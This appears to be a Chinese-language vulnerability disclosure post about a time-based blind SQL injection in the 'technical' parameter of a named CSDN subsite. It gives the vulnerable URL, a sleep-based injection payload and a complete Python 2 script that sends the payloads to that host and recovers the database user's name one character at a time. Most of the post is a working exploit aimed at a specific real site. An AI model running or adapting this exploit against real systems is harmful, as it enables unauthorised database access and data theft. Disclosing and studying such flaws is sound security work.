CSDN某分站SQL盲注漏洞(附poc)===== 时间延迟

URL:http://ibmuniversity.csdn.net/m/zone/ibm/rockstack?search=%e6%90%9c%e7%b4%a2&technical=*

存在问题参数是:technical

payload:(select(0)from(select(sleep(3)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(XXXX)))v)%2b%22*/



sqlmap跑不出来,用python跑,不过这里需要修改一下payload

(select(0)from(select(sleep(3)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(if(****,sleep(XXXX),0)))v)%2b%22*/



# -*- coding: utf-8 -*-

#!/usr/bin/env python

#mysql_timebased.py

#version 1.0



import httplib

import urllib



headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0'}

payloads = 'abcdefghijklmnopqrstuvwxyz1234567890.@_*%'



def GetUlength():#获取当前用户长度

    userlen = 0

    for i in range(1,99):

        err_count = 0

        for j in range(3):

            try:

                s1 = "length(user())=%s" % i

                s = "(select(0)from(select(sleep(3)))v)/*%27%2b(select(0)from(select(sleep(3)))v)%2b%27%22%2b(select(1)from(select(if("+s1+",sleep(2),0)))v)%2b%22*/"

                url = '/m/zone/ibm/rockstack?search=%e6%90%9c%e7%b4%a2&technical='+s

                #body = "page=20"

                conn = httplib.HTTPConnection('ibmuniversity.csdn.net',timeout=4)

                conn.request(method='GET',headers=headers,url=url)

                conn.getresponse()

                conn.close()

                print '*',

            except:

                err_count +=1

        if err_count == 3:

            userlen = i

            break

    return userlen



def GetUser(l):#获取当前用户名

    user = ''

    for i in range(1,l):

        for payload in payloads:

            err_count = 0

            #print payload

            for j in range(3):

                try:

                    s1 = "ascii(mid(lower(user()),%s,1))=%s" % (i,ord(payload))

                    s = "(select(0)from(select(sleep(3)))v)/*%27%2b(select(0)from(select(sleep(3)))v)%2b%27%22%2b(select(1)from(select(if("+s1+",sleep(2),0)))v)%2b%22*/"

                    url = '/m/zone/ibm/rockstack?search=%e6%90%9c%e7%b4%a2&technical='+s

                    #body = "page=20"

                    conn = httplib.HTTPConnection('ibmuniversity.csdn.net',timeout=4)

                    conn.request(method='GET',headers=headers,url=url)

                    conn.getresponse()

                    conn.close()

                    print '*',

                except:

                    err_count +=1

            if err_count == 3:

                user += payload

                print '\n[info]',user

                break

    return user

                

def main():

    userlen = GetUlength()

    print "user length:\n",userlen

    current_user = GetUser(userlen)

    print "\n CurrentUser is :",current_user





if __name__ == '__main__':

    print 'mysql-timebased-sqlinjection:\n'

    main()


你可能感兴趣的:(CSDN某分站SQL盲注漏洞(附poc)===== 时间延迟)